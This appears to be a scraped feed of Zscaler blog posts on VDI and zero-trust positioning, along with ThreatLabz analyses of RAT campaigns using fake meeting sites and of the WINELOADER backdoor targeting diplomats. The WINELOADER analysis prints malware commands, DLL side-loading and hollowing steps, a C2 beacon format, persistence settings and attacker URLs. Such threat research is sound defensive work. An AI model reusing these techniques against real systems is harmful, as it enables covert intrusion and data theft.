keep the VDI environment up and running needs a preamble. ZCC does not support multiple, simultaneous user sessions from a single host operating system. The main problem to address is supporting ZIA and ZPA services on multi-user VDI environments. Zscaler now offers the ability to inspect all ports and protocols for multi-session, non-persistent VDI deployments in the public cloud and on-prem data centers through the use of a VDI agent. Enterprises can apply granular threat and data protection policies per individual user session, enabling enterprises to maintain common security policies across all environments. Multi-user VDI can be hosted on a public cloud (Azure, AWS, etc.) or private data centers (VMWare or KVM, etc.). Cloud/Branch Connector can be used to direct traffic from the VDI users to the Zscaler cloud and extend ZIA and ZPA services to the VDI users. However, Cloud/Branch Connector does not have any user/VM context to the traffic and will enforce a single security policy to all the VDI users. To fix this issue, we leverage a VDI agent, that is a lightweight software package running in the user space of the VDI session. It is responsible for authenticating users, establishing a tunnel to Branch or Cloud Connector (Control and Data) and exchanging user context with the Branch or Cloud Connector (see below diagram). The VDI Agent maintains proprietary, lightweight tunnels (UDP encapsulation) to the local Cloud or Branch Connector. These tunnels carry both user session data in the payload, as well as user context information in the UDP header. These tunnels are stateless, which ensures that - in the event of a Branch or Cloud Connector failure - they can failover to other active appliances. With that said, we have now the possibility to extend Zscaler services to multi-user VDI environments. Legacy app support Although this scenario is becoming more and more niche due to applications and architecture evolution, that’s an area where VDI could help customers. The Zscaler Client Connector supports the latest software version and the two previous versions for each software product. See more details on the Zscaler Help page. At a higher level - digging into why organisations use VDI in the first place is important. Walking through their use cases and applications to explore the scope is important to move customers beyond the assumptions that flow from the on-premises/on-network mindset. In some cases, Zscaler can be integrated in the existing environment to simply provide the appropriate level of security. There are two main aspects to consider: Most applications are now web-based and could be securely made available to users regardless of VDI. Even if VDI is not replaced for all users, there are multiple reasons to integrate with ZIA/ ZPA. Just think about users like financial advisors and insurance agents. Many firms have moved to web-based apps, DocuSign, etc. There may no longer be a hard requirement for those thousands of users to have VDI. This requires going beyond what the network team may see, and engaging architects, app owners, etc. If we focus on the second aspect; rather than replacing the VDI infrastructure, another approach is to complement it. If we think about those use cases, organisations could still have security concerns around the user’s connectivity to the VDI environment (e.g. VMware Knowledge Base). In these scenarios, ZPA could protect that user traffic: it can secure access “to” the VDI environment and access “from” the VDI environment like shown in the below diagram. The protection of traffic aimed to Internet/SaaS is addressed by ZIA services. Connectivity to the VDI environment: Organisations may either put the VDI on the edge with its own DMZ infrastructure, firewall, security gateway, load balancer, etc. and have users connect directly or leverage a VPN-like technology to put the user on the network to access the VDI. ZPA, with Client Connector, enables a customer to either replace their internet-facing components or replace their VPN that is putting users onto the network. Connectivity from the VDI environment: Organisations want to further segment what users have access to from their trusted device. ZPA with Client Connector can assist with setting up granular access on an application level. Complete alternative to VDI: Organisations can leverage alternatives to VDI such as Zscaler Browser Isolation to replace their traditional VDI architecture. The benefits remain the same if a user has a browser managed by the enterprise which is isolated from the endpoint, the organisations admin remains in control of what can be egressed. Benefits of such an approach is the significantly lowered overhead to manage such a capability. The Zscaler Client Connector can be installed on the user’s device along with the VDI client, and ZPA carries the VDI traffic as a private application. Another option is installing ZCC on the virtual desktop instance (Citrix XenDesktop, Azure WVD, Amazon WorkSpaces) to control what the user has access to internally. Existing customers are deploying this model with WVD and Amazon Workspaces using ZCC for both ZIA and ZPA. Benefits in such a scenario are centralized visibility and control, single access control policy config for VDI, and other forms of access, creating a consistent user experience. Finally, a hybrid approach is feasible. In this case, organisations want to offer direct ZPA access to employees, but VDI-only access to third parties, and want to extend ZPA’s centralized visibility and control for VDI users accessing private applications. All these examples show that there are multiple ways to either completely exchange or complement the existing VDI installation. Fri, 08 Mar 2024 00:59:22 -0800 Stefano Alei Android and Windows RATs Distributed Via Online Meeting Lures IntroductionBeginning in December 2023, Zscaler’s ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor’s malicious URLs and files can be identified on these fraudulent online meeting websites. Key Takeaways A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites. The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems. Campaign OverviewThe attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian as shown in all the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites. Attack SequenceThe diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign: Figure 1: Attack chain and execution flow for Android and Windows campaigns. When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file when executed performs additional actions, ultimately leading to the download of a RAT payload. SkypeDuring our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application as shown in Figure 2. Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Image courtesy of The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to, indicating that the threat actor was not targeting iOS users with malware. Google MeetIn late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/ where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}. The fake site provides links to download a fake Skype application for Android and/or Windows. The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor. Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware. The Android link in this figure led to a SpyNote RAT APK file named meet.apk. ZoomIn late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload. Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. Open DirectoriesIn addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive, which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names. Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications. ConclusionOur research demonstrates that businesses may be subject to threats that impersonate online meeting applications. In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches. As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community. Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process. Figure 6: DCRat Zscaler sandbox report Figure 7: NjRAT Zscaler sandbox report Zscaler’s multilayered cloud security platform detected payloads with the following threat names: Win32.Backdoor.DCRat Win32.Backdoor.NjRat MITRE ATT&CK TechniquesEnterprise MatrixTACTIC TECHNIQUE ID TECHNIQUE NAME Execution T1064 T1059.001 Scripting PowerShell Persistence T1547.001 Registry Run Keys / Startup Folder Privilege Escalation T1547 Boot or Logon Autostart Execution Defense Evasion T1140 T1064 T1027 T1027.002 T1070.004 T1036 Deobfuscate/Decode Files or Information Scripting Obfuscated Files or Information Software Packing File Deletion Masquerading Credential Access T1056 T1555 Input Capture Credentials from Password Stores Discovery T1124 T1083 T1082 T1518.001 T1057 T1010 T1018 T1016 T1120 System Time Discovery File and Directory Discovery System Information Discovery Security Software Discovery Process Discovery Application Window Discovery Remote System Discovery System Network Configuration Discovery Peripheral Device Discovery Collection T1123 T1115 T1056 T1113 T1125 Audio Capture Clipboard Data Input Capture Screen Capture Video Capture Command and Control T1219 T1573 T1571 T1095 T1071 Remote Access Software Encrypted Channel Non-Standard Port Non-Application Layer Protocol Application Layer Protocol Impact T1498 T1529 Network Denial of Service System Shutdown/Reboot Mobile MatrixTACTIC TECHNIQUE ID TECHNIQUE NAME Persistence T1624 T1444 Event Triggered Execution: Broadcast Receivers Masquerade as Legitimate Application Privilege Escalation, Persistence T1626 T1546 Abuse Elevation Control Mechanism Event Triggered Execution Collection T1533 T1429 T1430 T1636 Data from Local System Audio Capture Location Tracking Contact and SMS data Tue, 05 Mar 2024 08:30:01 -0800 Himanshu Sharma Positioning Zscaler Private Access Relative to VDI: Part 1 What are some of the most common concerns heard from customers about virtual desktop infrastructure (VDI)? They are often related to cost, complexity, management, upkeep, and security. How can Zscaler solve these challenges? VDI is an undoubtedly complex environment, and having a clear picture of the organization’s needs, and positioning the right solution to improve security, reduce complexity, and improve the user experience is not always easy. Zscaler Private Access (ZPA) has evolved in the past few years and become a direct replacement of VDI, whether on-premises or cloud-delivered. It is, however, not yet possible to map all the use cases supported by a VDI implementation and, in general, is not a trivial task. Sometimes Zscaler can play a role by simply integrating solutions and providing the right level of security. To be able to understand which role ZPA can play to replace VDI, it is crucial to first understand why the customer is using a VDI. Organisations leverage VDI for various reasons. The most common use cases are: 1. Access granularity – restrict users’ access to only authorized applications 2. Traffic inspection – VDI as a choke point to run all traffic through on-premises security stacks 3. Data residency restriction a) Ensure data stays within corporate boundary and/or b) Ensure data is never stored on an end user's device 4. Traffic localization – minimize latency for heavyweight client-server interactions (e.g. database calls) 5. Desktop or software license management / reduction a) Clean desktop experience b) Persistent desktop that the user can access from multiple devices c) Software deployed to a limited pool of virtual desktops, rather than to all user devices 6. Legacy app support – enable access to apps that require an older OS VDIs are expensive, cumbersome to manage, and often hinder user experience. But there is much more to think about: we are witnessing profound changes in the EUC (End User Computing) market. Considering most applications are now web-based, you could potentially replace a VDI with an isolated browser access and provide secure access to these web applications. Applications requiring access via protocols, such as SSH and RDP, can be easily addressed using the Zscaler Privileged Remote Access (PRA). However, organisations probably still need to depend on VDIs in certain scenarios, like if they have applications requiring thick clients. In this case, they would be able to significantly reduce the size of their VDI deployment by using browser isolation. Whenever Zscaler can’t replace VDI, it can still be integrated. Zscaler can secure Internet/SaaS access of VDI instances, and additionally can protect access to VDI infrastructure. Whenever there is a VDI environment, ZIA and ZPA capabilities can play a role and improve an environment. Major use cases in detail 1. Access granularity This use case is fully supported and can be deployed by leveraging multiple capabilities of the Zscaler Zero Trust Exchange platform, like Browser Isolation. It allows you to leverage a web browser for user authentication and application access over ZPA, without requiring users to install Zscaler Client Connector on their devices. In certain cases, it might not be feasible or desirable to install Client Connector on all devices. For example, you might want to provide third-party access to applications on devices that might not be owned or managed by your company (e.g., contractor or partner-owned devices) or control user access to applications on devices with operating systems that are not currently supported by Zscaler Client Connector. Browser Isolation (BI) enhances the ZPA experience by making applications accessible for users from any web browser without requiring Zscaler Client Connector or browser plugins and configurations. Additionally, the existing Identity Provider (IdP) can be used to provide access to current users, contractors, and other third-party users without managing an internet footprint. BI is a feature that addresses needs in both cyberthreat protection and data loss prevention and can be leveraged for both internet/SaaS apps and private apps. BI policies can dictate if a site should be run within isolation, and if so, whether you allow cut/paste and download capabilities for the user. An isolation container is instantiated for each user in the cloud and only pixels are transmitted to the user’s browser. Sites may be isolated due to a configured URL category, cloud app control policy, or suspicious destinations (if Smart Browser Isolation is enabled). Last, but not least, is worthwhile to mention the recent capabilities introduced by the User Portal 2.0, that allows unmanaged devices to SaaS & private web apps. With this feature enabled, unmanaged devices will be able to use ZPA user portal to access both sanctioned SaaS/private web apps AND have their internet facing traffic routed through ZIA while in Isolation mode. Organisations can provide access to sanctioned SaaS applications from unmanaged devices to enforce policies using the isolation policies defined on ZPA. The isolation containers that are created as a result of a ZPA Isolation Policy can forward non-ZPA defined application traffic and internet traffic generated to ZIA for further processing and enforcement of necessary policies. Any traffic generated for applications defined on ZPA will continue to be forwarded via ZPA’s ZTNA service. 2. Traffic inspection Although this use case is rare, traffic inspection is still fully supported, leveraging the inspection capability provided by the Zero Trust Exchange platform. We can use Zscaler Private Access (ZPA) AppProtection (formerly Inspection), that provides high-performance, inline security inspection of the entire application payload to expose threats. It identifies and blocks known web security risks, such as the OWASP Top 10, and emerging zero-day vulnerabilities that can bypass traditional network security controls. It can help to protect internal applications from all types of attacks in the OWASP predefined controls with SQL injection, cross-site scripting (XSS), and more. Additionally, it helps to understand the severity, description, and recommended default action for each type of attack related to OWASP predefined controls. Each OWASP predefined control is identified with a unique number, defining how the control operates, and is associated with the level of concern. The predefined controls are organized into various categories: - Preprocessors - Environment and Port Scanners - Protocol Issues - Request Smuggling or Response Split or Header Injection - Local File Inclusion - Remote File Inclusion - Remote Code Execution - PHP Injection - Cross-Site Scripting (XSS) - SQL Injection - Session Fixation - Deserialization - Issues Anomalies Additionally, Zscaler recently introduced support for inspecting ZPA application segment traffic. A predefined forwarding rule, ZIA Inspected ZPA Apps, is available on the Policy > Forwarding Control page to inspect the Microtunnel traffic of a ZPA application segment using ZIA. This rule is applied automatically to the traffic from ZPA application segments with the Inspect Traffic with ZIA field enabled in the ZPA Admin Portal. As part of this feature, a predefined Auto ZPA Gateway is available on the Administration > Zscaler Private Access Gateway page. This new gateway is the default for the predefined ZIA Inspected ZPA Apps forwarding rule. We can minimize data exfiltration concerns with ZPA AppProtection, by utilizing Cloud Browser Isolation (CBI) where unmanaged devices are prevented from downloading sensitive content to the local host. For corporately managed devices, organisations can leverage DLP with Source IP Anchoring (SIPA) utilizing the ZIA cloud. AppProtection customers can craft custom signatures to detect and block bulk data downloads and use those in conjunction with other validation methods such as ZPA posture control. Organisations can rely on Zscaler Internet Access (ZIA) SSL Inspection best practices for configuring and deploying in an organization's network environment, for example, while accessing SaaS applications. Encrypting communications helps maintain the privacy and security of information passed between sender and receiver communications. Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are protocols designed for the privacy and security of internet services. While these protocols do a great job of keeping information private from prying eyes, these security tools also conceal threats to the user, device, and organization. This is where the inspection of SSL and TLS encrypted traffic becomes a necessity. Inspecting encrypted SSL and TLS traffic via SSL Inspection is done by the Zero Trust Exchange at scale, allowing organizations to control risk and enforce policy. Enabling SSL Inspection is a required first step towards: - Controlling risk - Inspecting traffic (malware, data loss) - Adaptive control - Enforcing policy - Per-session policy decision and enforcement - Allowing, blocking, and restricting tenants environment. Use cases 3 to 6 will be covered in part two of this series. Fri, 01 Mar 2024 02:41:49 -0800 Stefano Alei Securing Government Workload Communications in the Public Cloud As government agencies continue their journey towards digital transformation, many are embracing hybrid cloud deployments to modernize their operations. A transition to a public or private cloud brings new challenges, especially when it comes to securing workload communications. In this blog, we will delve into the reality of hybrid cloud deployments and explore how Zscaler's zero trust architecture provides a comprehensive solution for securing government workloads in the public cloud. The Expanding Definition of Hybrid Cloud Hybrid cloud deployments have become increasingly complex as agencies expand their infrastructure across multiple regions and clouds. Rather than relying on a single cloud or region, agencies leverage different regional clouds to ensure availability and scalability. Additionally, within a specific region, agencies may need to consider availability zones to ensure business continuity. Figure 1 illustrates scenarios of hybrid cloud deployments. Workload Communications in the Public Cloud To illustrate the challenges of workload communications, let's consider the example of a Department of Motor Vehicles (DMV) application deployed in the AWS GovCloud. This application needs to interact with other workloads or applications, such as a CRM or ERP system in the data center, to access driver records. It may also need to communicate with scheduling applications in different regions or clouds, and even access vehicle registration information stored in a different cloud provider such as Azure. Additionally, the DMV application may require software updates and send logs to the Google Cloud Platform. Figure 2 shows Legacy Architecture Challenges Traditionally, agencies have extended their on-premises architecture to the cloud by deploying firewalls and VPNs. While this approach may provide initial security, it also amplifies lateral movement, increases cyberthreats, and exposes the infrastructure to data leaks. Moreover, deploying and managing multiple firewalls and VPNs across different cloud environments and regions adds complexity and operational costs. Introducing Zscaler's Zero Trust Approach Zscaler offers a cloud-delivered security platform based on zero trust principles to address the challenges faced by government agencies in securing workload communications. By adopting a zero trust proxy-based architecture, Zscaler eliminates the expanded attack surface and lateral movement risks associated with legacy architectures. Connectivity and Security Zscaler's platform provides both connectivity and security for workloads in the public cloud. It ensures secure connectivity by allowing access only to specific URLs or APIs, preventing open access to the internet. Workload-to-workload communications are based on least privileged access, ensuring that each workload can only communicate with authorized resources. Before any connection is established, zero trust-based authentication and authorization checks are performed, further enhancing security. Threat Prevention and Data Protection Zscaler's platform offers comprehensive threat prevention and data protection capabilities. It provides URL filtering, intrusion prevention, DNS protection, and behavior analysis, all backed by AI and ML-based risk analysis. Inline data protection ensures that sensitive data does not leak from workloads, with features such as regex-based checks, exact data management matching, OCR technology for file inspection, and AI/ML-based data classification. TLS Decryption at Cloud Scale With the increasing prevalence of encrypted traffic, TLS decryption at cloud scale becomes crucial. Zscaler's platform provides 100% inspection of traffic without compromising performance. This allows for effective threat prevention and data protection, ensuring the safety of data packets and preventing malicious intent. Granular App-to-App Segmentation Zscaler enables granular app-to-app segmentation, eliminating the need for expensive networking infrastructure or additional layers of segmentation software. This ensures that workloads can only access authorized resources, providing an additional layer of security. The Common Platform Advantage Zscaler's platform offers a common platform for securing workloads across multiple clouds. By installing lightweight cloud connectors in different clouds, agencies can benefit from standardized and consolidated security operations. This approach simplifies security management, reduces operational complexity and costs, and ensures consistent security policies across multiple clouds. It stops external threats, by protecting egress traffic from any malicious payload. It protects against insider threats by eliminating the threat of a bad actor within the agency who's got the credential to inflict harm, either by inserting a payload, a malicious payload, or trying to exfiltrate data sensitive data. The Zero Trust Exchange is designed to eliminate lateral movement and reduce the attack surface significantly. Moreover, Zscaler's platform is both FedRAMP and StateRAMP Authorized and GovCloud ready. For more information on Zscaler Workload Communications: Download the Datasheet Watch the Webinar: Ensuring Cloud Workload Security for Federal and State Government Request a Test Drive in AWS Wed, 28 Feb 2024 05:05:01 -0800 Sakthi Chandra European diplomats targeted by SPIKEDWINE with WINELOADER IntroductionZscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file is masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023.This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER'. We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack. The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.Key Takeaways Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats. New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server. Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions. Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain. Attack Chain Figure 1 below illustrates the multi-stage attack chain at a high level. Figure 1: Multi-stage attack chain of WINELOADER. Technical AnalysisIn this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.PDF analysisThe PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The invitation contains a link to a fake questionnaire, which kickstarts the infection chain.The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file - wine.hta.Figure 2 below shows the contents of the PDF file.Figure 2: The PDF invitation showcasing the malicious link.A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.HTA file analysisThe HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.Figure 3: Obfuscated JavaScript code inside the HTA file.The HTA file performs the following key functions:Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.phpSaves the text file to the path: C:\Windows\Tasks\text.txtUses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path: C:\Windows\Tasks\ The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\\Tasks\text.zipExtracts the contents of the ZIP archive to the path: C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\ -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.Executes sqlwriter.exe from the path: C:\Windows\Tasks\ which will kick start the infection chain.WINELOADER binary analysisWhen executing sqlwriter.exe, it loads a malicious DLL named vcruntime140.dll from the same directory using DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.Figure 4: Code section that decrypts and executes the WINELOADER core module.Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.WINELOADER employs the following techniques to evade detection:Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:The core module and subsequent modules downloaded from the C2 server Strings (e.g. DLL filenames and API import function names)Data sent and received from the C2 serverSome strings are decrypted on use and re-encrypted shortly after.Memory buffers for storing results from API calls or decrypted strings are zeroed after use.DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.WINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:advapi32.dllapi-ms-win-crt-math-l1-1-0.dllapi-ms-win-crt-stdio-l1-1-0.dllbcryptprimitives.dlliphlpapi.dllkernel32.dllkernelbase.dllmscoree.dllntdll.dllole32.dllrpcrt4.dllshlwapi.dlluser32.dllwininet.dllWINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.The body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected. This information in available in the table below.OffsetLengthNameDescription0x02Length of padding bytes (n)This value is randomized (min: 255, max: 65535), stored in little-endian (LE).0x2nPadding bytesPadding bytes are randomly generated with the ProcessPrng API.0x2 + n8Campaign ID?5F D5 97 93 ED 26 CB 5A in the analyzed sample.0xa + n8Session ID?Randomly generated on execution.0x12 + n 8Local IP addressThe local IP address of the infected machine.0x20 + n512Parent process nameIn Unicode0x220 + n512User nameIn Unicode0x420 + n30Machine nameIn Unicode0x43e + n4Parent process IDIn little-endian0x442 + n1Parent process token elevation typeInformation about the privileges of the token linked to the parent process.0x443 + n8Polling interval for C2 requestsC0 d4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.0x44b + n1Request type?1 for beacon, 2 for status update0x44c + n8Length of messageIn little-endian. 0 for beacon requests0x454 + n8Unknown?Observed to match the value of the request type field.0x45c + n8Module ID?00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.0x464 + nVariesMessageOnly observed for type 2 requests.Table 1: WINELOADER C2 beacon request fieldsAn example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.GET /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1 Host: Content-Length: 54674 54,674 bytes of binary data in the request body (not shown here)The same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response are shown in the table below.OffsetLengthNameDescription0x02Length of padding bytes (n)This value is stored in little-endian (LE).0x2nPadding bytesUnused bytes0x2 + n8Campaign ID?5F D5 97 93 ED 26 CB 5A in the analyzed sample0xa + n1CommandCommand from C20xb + n VariesCommand dataBinary data for commandTable 2: WINELOADER C2 response fieldsThe core module supports three commands:Execute modules from the C2 either synchronously or asynchronously (via CreateThread)Inject itself into another DLLUpdate the sleep interval between beacon requestsDuring our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily.The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.Command And Control Infrastructure The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers. Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads. Conclusion The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe. The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions. While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats. Zscaler Coverage Figure 7: Zscaler sandbox detection report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names: Win64.Downloader.WineLoader Indicators Of Compromise (IOCs) SHA256 Description 72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4 vcruntime140.dll (WINELOADER core module loader) ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7 wine.pdf (July 2023 invitation) 3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9 wine.pdf (Feb 2024 invitation) 1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc wine.hta e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc WINELOADER core module f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45 WINELOADER core module (RC4-encrypted) c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e WINELOADER persistence module loader b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920 WINELOADER persistence module 7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083 WINELOADER persistence module (RC4-encrypted) URL Description hxxps://castechtools[.]com/api.php WINELOADER C2 hxxps://seeceafcleaners[.]co[.]uk/cert.php Downloads base64-encoded ZIP archive from this URL. hxxps://seeceafcleaners[.]co[.]uk/wine.php Downloads the ZIP archive containing the wine.hta file. hxxps://passatempobasico[.]com[.]br/wine.php Downloads the ZIP archive containing the wine.hta file (IOC from July 2023). MITRE ATT&CK Framework ID Tactic Description T1204.002 User Execution: Malicious File The PDF file that masquerades as an invitation contains a malicious link. T1656 Impersonation The contents of the PDF are crafted to impersonate the Ambassador of India. T1204.001 User Execution: Malicious Link The PDF file contains a link that leads to the download of a malicious ZIP archive. T1574.002 Hijack Execution Flow: DLL Side-Loading sqlwriter.exe is used to DLL side-load vcruntime140.dll. T1055.001 Process Injection: Dynamic-link Library Injection DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER in that DLL. T1573.001 Encrypted Channel: Symmetric Cryptography RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server. T1041 Exfiltration Over C2 Channel Data is encrypted and exfiltrated to the C2 server. T1584 Compromise Infrastructure Compromised sites are used for hosting payloads and as a C2 server. T1053.005 Scheduled Task/Job: Scheduled Task A scheduled task with the name “MS SQL Writer” is created to ensure sqlwriter.exe is executed to kick-start the infection chain. T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer. T1140 Deobfuscate/Decode Files or Information WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use. T1036.001 Masquerading: Invalid Code Signature vcruntime140.dll has an invalid Microsoft code signing certificate. T1036.004 Masquerading: Masquerade Task or Service The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task. T1027.007 Obfuscated Files or Information: Dynamic API Resolution API names are 